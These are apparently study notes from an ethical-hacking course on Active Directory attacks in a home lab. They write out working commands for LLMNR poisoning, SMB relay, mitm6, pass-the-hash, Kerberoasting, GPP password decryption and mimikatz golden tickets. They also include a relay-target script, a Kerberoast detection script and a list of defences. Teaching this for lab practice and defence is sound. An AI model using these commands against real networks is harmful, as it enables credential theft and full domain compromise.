Active Directory Hacking for Beginners

Jul 14, 2024

Introduction

  • Instructor: Heath Adams
  • Course: this video is taken from the Practical Ethical Hacking (PEH) course (about 25 hours)
  • Course Coverage: the older PEH material is available for free; the up-to-date course is on the academy website as part of the All Access Plan
  • Material Includes:
    • Practical Ethical Hacking
    • Python, Rust coding
    • Malware analysis
    • Mobile pen testing
    • IoT hacking
    • Detection engineering
    • Windows forensics
  • Certifications: PJPT (Junior), PNPT (Advanced)
  • Live Training: next session September 16, 2023; PNPT live training runs every month or two
  • Subscription: Consider subscribing to the YouTube channel for more content

Setting Up Virtual Machines (VMs)

  • Types of VMs: Windows 10 instance, Linux instance
  • Installation Tools:
    • Windows/Linux: VMware Workstation Player
    • Mac: Oracle VirtualBox

Steps for VM Setup

  1. VMware Installation
    • Download VMware Workstation Player
    • Install using the wizard
  2. Oracle VirtualBox Installation (For Mac)
    • Use Oracle VirtualBox for Mac
    • Download and install
  3. VM Creation
    • Allocate at least 4 GB RAM
    • Use NAT network settings
  4. Kali Linux Installation
    • Download Kali Linux VM image
    • Extract and open in VMware Workstation Player or Oracle VirtualBox
    • Change VM settings as needed
  5. Installing Pimp My Kali (fixes common Kali tool breakage and adds the tools used in the course)
    • Clone the repository: sudo git clone https://github.com/Dewalt-arch/pimpmykali
    • Run cd pimpmykali && sudo ./pimpmykali.sh and pick the "new VM" option when prompted

Active Directory Lab Overview

  • Components:
    • Windows Server 2019 (Domain Controller)
    • Windows 10 Enterprise Machines (2 instances)
  • Requirements: 16 GB RAM, 60 GB disk space
  • Alternative Setup: if the host machine cannot meet those requirements, the academy offers a guided Azure lab build (additional cost, Azure usage billed separately); no technical support is provided for it

Active Directory Lab Setup

  1. Downloading ISOs
    • Windows Server 2019
    • Windows 10 Enterprise (Evaluation Center)
  2. Install Windows Server 2019
    • Create new VM settings
    • Remove floppy drive
    • Set NAT network
    • Install roles (Active Directory Domain Services)
    • Promote to domain controller, set domain (e.g., marvel.local)
  3. Install Windows 10 Enterprise Machines
    • Create two VMs from the same ISO
    • Install each as a standalone workstation with a local account first
    • Set appropriate RAM and the same NAT network as the domain controller, and point each machine's DNS at the domain controller's IP
    • Join both machines to the domain (e.g., marvel.local) and reboot
  4. Domain Controller Configuration
    • Create and manage users (e.g., Frank Castle, Tony Stark, SQLService); give SQLService a Service Principal Name so the Kerberoasting exercise later has a target
    • Set up file shares (e.g., HackMe share)
    • Set Group Policy (e.g., disable Windows Defender so the tools used later are not quarantined) and make a domain user a local administrator on each workstation, since several of the attacks depend on that misconfiguration

Initial Attack Vectors

  1. Responder and LLMNR Poisoning

    • LLMNR and NBT-NS are Windows name-resolution fallbacks: when a user mistypes a name (e.g. \\hackme instead of \\hydra-dc\hackme), the query is broadcast, Responder answers it, and the victim authenticates to the attacker, leaking an NTLMv2 challenge/response
    • Run Responder early in the day or after lunch, when users are logging on: sudo responder -I <interface> -dwv (older Responder versions also take -r; check responder -h for the flags your version supports)
    • An NTLMv2 response is salted with the challenge, so it cannot be replayed or passed; crack it with Hashcat: hashcat -m 5600 hashes.txt rockyou.txt
  2. SMB Relay

    • Instead of cracking the captured authentication, relay it to another host; this only works against hosts where SMB signing is not required, and only yields access if the relayed user is a local admin on the target
    • Find candidates with nmap --script=smb2-security-mode -p445 <range> and put the hosts reporting "Message signing enabled but not required" in a targets file (domain controllers require signing by default and will not be relayable)
    • Turn SMB and HTTP off in Responder.conf (/etc/responder/Responder.conf on Kali) so Responder only poisons and ntlmrelayx handles the authentication, then run: sudo responder -I <interface> -dwv
    • Relay with: ntlmrelayx.py -tf targets.txt -smb2support (add -i for an interactive SMB shell, or -c "<command>" to run a command on the target)
    • On success ntlmrelayx dumps the target's local SAM hashes, which can then be used for pass-the-hash; a captured authentication cannot be relayed back to the host it came from
  3. IPv6 Attacks (mitm6)

    • Windows prefers IPv6, and most networks never configure it, so an attacker answering DHCPv6 becomes the IPv6 DNS server for every Windows host on the segment
    • Run: sudo mitm6 -d <domain> (e.g. marvel.local); mitm6 also serves a WPAD entry so machines authenticate to the attacker
    • Relay those authentications to LDAPS on the domain controller: ntlmrelayx.py -6 -t ldaps://<DC IP> -wh fakewpad.<domain> -l lootme
    • When a user logs on or reboots, ntlmrelayx dumps domain information into the lootme/ directory; when an administrator authenticates, it creates a new domain user and grants it high privileges (the tool logs exactly what it did, so record it for cleanup)
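Picking relay targets (item 2 above) is the step beginners get wrong: relaying to a host that requires signing fails silently, and relaying back to the victim's own host never works. The following is an added example, not code from the course or from Responder/Impacket: it parses the output of nmap's smb2-security-mode script and emits the targets file that ntlmrelayx -tf expects. The scan output is constructed for the example (the hostnames, IPs and the 192.168.57.0/24 range are assumptions), and the "Message signing ..." strings are the ones the NSE script prints.

```python
import re
from typing import Dict, Iterable, List

# Constructed sample of `nmap --script=smb2-security-mode -p445 192.168.57.0/24`
# output (not real scan data). 192.168.57.140 stands in for the domain controller,
# which requires signing by default; the two workstations do not.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for hydra-dc.marvel.local (192.168.57.140)
Host is up (0.00045s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

Nmap scan report for 192.168.57.141
Host is up (0.00038s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required

Nmap scan report for 192.168.57.142
Host is up (0.00041s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
"""

# nmap prints either "Nmap scan report for 1.2.3.4" or "Nmap scan report for name (1.2.3.4)"
HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?(\d{1,3}(?:\.\d{1,3}){3})\)?\s*$")
SIGNING_RE = re.compile(r"Message signing (.+?)\s*$")


def parse_signing(nmap_text: str) -> Dict[str, str]:
    """Map each scanned IP to the smb2-security-mode verdict nmap printed for it."""
    results: Dict[str, str] = {}
    current_ip = None
    for line in nmap_text.splitlines():
        host = HOST_RE.match(line)
        if host:
            current_ip = host.group(1)
            continue
        signing = SIGNING_RE.search(line)
        if signing and current_ip:
            results[current_ip] = signing.group(1)
    return results


def relay_targets(nmap_text: str, exclude: Iterable[str] = ()) -> List[str]:
    """Hosts where signing is not required: the only ones ntlmrelayx can relay to.

    `exclude` is for the host whose user you expect to capture; a captured
    authentication cannot be relayed back to the machine it came from."""
    skip = set(exclude)
    return sorted(
        ip for ip, mode in parse_signing(nmap_text).items()
        if "not required" in mode and ip not in skip
    )


def write_targets_file(nmap_text: str, path: str, exclude: Iterable[str] = ()) -> int:
    """Write one target per line (the format -tf expects); returns the number written."""
    targets = relay_targets(nmap_text, exclude)
    with open(path, "w") as fh:
        fh.write("\n".join(targets) + "\n")
    return len(targets)


if __name__ == "__main__":
    # Usage: nmap ... -oN scan.txt; python3 relay_targets.py < scan.txt > targets.txt
    for ip in relay_targets(SAMPLE_NMAP_OUTPUT):
        print(ip)
```

Feed the resulting file to ntlmrelayx.py -tf targets.txt -smb2support. Remember that a host in the list is only useful if the user you capture is a local administrator there; the scan tells you where relaying is possible, not where it will succeed.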

Post-Compromise Enumeration

  1. PowerView

    • PowerShell-based AD enumeration script from PowerSploit
    • Start PowerShell with the execution policy bypassed and dot-source the script so its functions load into the session: powershell -ep bypass, then . .\PowerView.ps1
    • Commands: Get-NetDomain, Get-NetDomainController, Get-DomainPolicy, Get-NetUser, Get-NetComputer, Get-NetGroup, Invoke-ShareFinder, Get-NetGPO, etc.
  2. BloodHound

    • Graphs AD relationships (group memberships, sessions, ACLs) to find the shortest path to Domain Admin
    • Install and set up on Kali: sudo apt install bloodhound, start the database with sudo neo4j console (set the neo4j password at http://localhost:7474 on first use), then run bloodhound and log in with those credentials
    • Collect data with SharpHound (SharpHound.ps1 or SharpHound.exe on a domain-joined host) or remotely from Kali with bloodhound-python -d <domain> -u <user> -p <password> -ns <DC IP> -c all, then upload the resulting JSON/zip into the BloodHound GUI
    • Use the built-in queries (Find all Domain Admins, Shortest Paths to Domain Admins, etc.) to identify attack paths

Post-Compromise Attacks

  1. Pass-the-Password and Pass-the-Hash

    • Reuse what has been recovered so far: a cracked plaintext password, or an NT hash dumped from SAM/LSASS; Responder's NTLMv2 responses cannot be passed, only cracked
    • Spray a password across the subnet: crackmapexec smb <range> -u <user> -d <domain> -p <password>
    • Pass a local admin's NT hash: crackmapexec smb <range> -u administrator -H <NT hash> --local-auth (add --sam to dump hashes from every host it lands on, --shares to list shares)
    • The same hash works with Impacket's secretsdump.py and psexec.py via -hashes :<NT hash> for dumps and shells
  2. Token Impersonation

    • Tokens are temporary keys that let a process act as a user without re-entering credentials; delegate tokens (interactive and RDP logons) can be impersonated from a Meterpreter session that has local admin on the host
    • In Meterpreter: load incognito, then list_tokens -u and impersonate_token <DOMAIN>\\<user> (the backslash must be doubled)
    • If a Domain Admin is logged on to that host, impersonating their token lets you run domain-level commands (such as creating users) from it
  3. Kerberoasting

    • Any authenticated domain user can request a service ticket (TGS) for any account that has a Service Principal Name (SPN); the ticket is encrypted with that service account's password hash, so it can be cracked offline
    • Request tickets: GetUserSPNs.py <domain>/<user>:<password> -dc-ip <DC IP> -request
    • Crack the $krb5tgs$23$ ticket: hashcat -m 13100 tgs.txt rockyou.txt
    • Service accounts (e.g. SQLService) are often over-privileged and have old, weak passwords, which is why this works
  4. GPP / cPassword Attack

    • Group Policy Preferences let administrators embed credentials in policy XML (Groups.xml etc.) in SYSVOL; the cPassword value is AES-encrypted with a key Microsoft published, so anyone who can read SYSVOL (any domain user) can decrypt it
    • Patched in 2014 (MS14-025), but the patch only stops new entries from being created; existing XML files stay in SYSVOL until someone removes them
    • Locate the files (search SYSVOL for cpassword, or use Metasploit's smb_enum_gpp or Impacket's Get-GPPPassword.py) and decrypt with gpp-decrypt <cPassword>
  5. Golden Ticket Attack

    • With the krbtgt account's NT hash you can forge a ticket-granting ticket for any user, so the domain stays compromised until krbtgt is reset (twice, because the previous key remains valid)
    • On the domain controller with mimikatz: privilege::debug, then lsadump::lsa /inject /name:krbtgt to obtain the krbtgt NTLM hash and the domain SID
    • Forge and inject the ticket: kerberos::golden /User:Administrator /domain:<domain> /sid:<domain SID> /krbtgt:<NTLM hash> /id:500 /ptt, then misc::cmd opens a shell that can reach any machine (e.g. dir \\<host>\c$)
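Kerberoasting (item 3 above) leaves a clear trace on the domain controller: Event ID 4769 (a service ticket was requested) with TicketEncryptionType 0x17, i.e. RC4, because GetUserSPNs.py requests RC4 tickets so that the result cracks with hashcat -m 13100. The following detection is an added example, not code from the course or any product: it runs a simple rule over constructed 4769 records written as one key=value line per event (the field names mirror the event's XML data; the users, hosts and IPs are assumptions). It flags RC4 tickets for user-owned SPNs and then groups them by requester, since one principal pulling tickets for several SPNs within seconds is the signature of a Kerberoast sweep.

```python
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# Kerberos encryption types as Event 4769 reports them (TicketEncryptionType).
RC4_HMAC = "0x17"             # etype 23: what GetUserSPNs.py asks for; hashcat -m 13100
AES_TYPES = {"0x11", "0x12"}  # etype 17/18 (AES128/AES256): hashcat -m 19600 / 19700

# Constructed Event 4769/4768 records (not real logs). fcastle requests RC4 service
# tickets for two user-owned SPNs in one second; pparker's traffic is normal logon noise.
SAMPLE_4769_LOG = """\
2024-07-14T10:01:02Z EventID=4769 TargetUserName=fcastle@MARVEL.LOCAL ServiceName=SQLService TicketEncryptionType=0x17 IpAddress=::ffff:192.168.57.150 Status=0x0
2024-07-14T10:01:02Z EventID=4769 TargetUserName=fcastle@MARVEL.LOCAL ServiceName=svc-backup TicketEncryptionType=0x17 IpAddress=::ffff:192.168.57.150 Status=0x0
2024-07-14T10:01:03Z EventID=4769 TargetUserName=fcastle@MARVEL.LOCAL ServiceName=THEPUNISHER$ TicketEncryptionType=0x12 IpAddress=::ffff:192.168.57.150 Status=0x0
2024-07-14T09:30:11Z EventID=4769 TargetUserName=pparker@MARVEL.LOCAL ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=::ffff:192.168.57.141 Status=0x0
2024-07-14T09:31:40Z EventID=4769 TargetUserName=pparker@MARVEL.LOCAL ServiceName=HYDRA-DC$ TicketEncryptionType=0x12 IpAddress=::ffff:192.168.57.141 Status=0x0
2024-07-14T10:02:00Z EventID=4768 TargetUserName=tstark IpAddress=::ffff:192.168.57.142 Status=0x0
"""

FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_events(log_text: str) -> List[Dict[str, str]]:
    """Turn each 'timestamp key=value ...' line into a dict (Timestamp added)."""
    events = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        timestamp, _, rest = line.partition(" ")
        fields = dict(FIELD_RE.findall(rest))
        fields["Timestamp"] = timestamp
        events.append(fields)
    return events


def is_user_service_account(service_name: str) -> bool:
    """Machine accounts end in '$' and krbtgt is the TGT service; neither is a
    Kerberoast target because their keys are long random values, not passwords."""
    return not service_name.endswith("$") and service_name.lower() != "krbtgt"


def kerberoast_candidates(log_text: str) -> List[Dict[str, str]]:
    """Successful 4769s that look like a Kerberoast: RC4 ticket for a user-owned SPN."""
    return [
        e for e in parse_events(log_text)
        if e.get("EventID") == "4769"
        and e.get("TicketEncryptionType") == RC4_HMAC
        and e.get("Status") == "0x0"
        and is_user_service_account(e.get("ServiceName", ""))
    ]


def kerberoast_sweeps(log_text: str, min_services: int = 2) -> Dict[Tuple[str, str], List[str]]:
    """Group candidates by (requesting user, source IP) and keep requesters that
    pulled tickets for at least `min_services` distinct SPNs: the GetUserSPNs -request
    pattern, as opposed to one legacy client that genuinely needs an RC4 ticket."""
    by_source: Dict[Tuple[str, str], set] = defaultdict(set)
    for e in kerberoast_candidates(log_text):
        by_source[(e["TargetUserName"], e["IpAddress"])].add(e["ServiceName"])
    return {key: sorted(spns) for key, spns in by_source.items() if len(spns) >= min_services}


if __name__ == "__main__":
    for (user, ip), spns in kerberoast_sweeps(SAMPLE_4769_LOG).items():
        print(f"possible Kerberoast from {user} at {ip}: {', '.join(spns)}")
```

The RC4 filter is a first cut, not a complete rule: where an SPN account only supports AES, tools request AES tickets (hashcat -m 19700) and the encryption-type check alone misses them, which is why the per-requester SPN count is kept as a separate signal. On a real domain, pull the events with Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4769} on the domain controller and map the XML fields to the same names.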

Summary and Recommendations

  • Essential Tools:
    • Responder (LLMNR/NBT-NS poisoning, NTLMv2 capture)
    • BloodHound with SharpHound or bloodhound-python (attack-path graphing)
    • PowerView (PowerShell AD enumeration)
    • CrackMapExec (password spraying, pass-the-hash, SAM dumps)
    • Metasploit with incognito (token impersonation)
    • Impacket toolkit (GetUserSPNs.py, ntlmrelayx.py, secretsdump.py, psexec.py)
    • Mimikatz (LSA dumps, cleartext credentials, pass-the-ticket, golden tickets)
    • Hashcat (NTLMv2: -m 5600, Kerberoast TGS: -m 13100)
  • Certifications:
    • PJPT: Penetration testing basics, includes training material
    • PNPT: Advanced, focused on active directory
  • Further Study and Practice:
    • Continue with HackTheBox, TryHackMe labs
    • Engage in CTF challenges for continued learning

Defensive Strategies

  • Disable LLMNR and NBT-NS (Group Policy "Turn off multicast name resolution", NetBIOS over TCP/IP off in the adapter settings) so there is nothing for Responder to poison
  • Enable and require SMB signing on every host, not only domain controllers, which stops SMB relay
  • Disable IPv6 where it is not used, or block rogue DHCPv6 and router advertisements, to defeat mitm6
  • Use strong password policies: long passphrases, above all for service accounts, so captured NTLMv2 and Kerberoast hashes do not crack
  • Account tiering and least privilege: no domain account should be a local administrator on workstations, and Domain Admins should log on only to domain controllers, so there is no token or hash worth stealing on a workstation
  • Enable Network Access Control (NAC) so a rogue device cannot join the segment in the first place
  • Deploy Privileged Access Management (PAM) tools, rotate service account passwords, remove any remaining GPP cPassword entries from SYSVOL, and reset krbtgt (twice) on a schedule and after any compromise

Conclusion

  • Subscription Encouragement: follow the channel for more content
  • Academy Access: additional courses and materials are available on the academy site
  • Next Steps: certifications can strengthen a resume for penetration testing roles; the PNPT is the one focused on Active Directory
  • Other Resources: keep practicing in labs and CTFs and engage with the community's shared resources for continued growth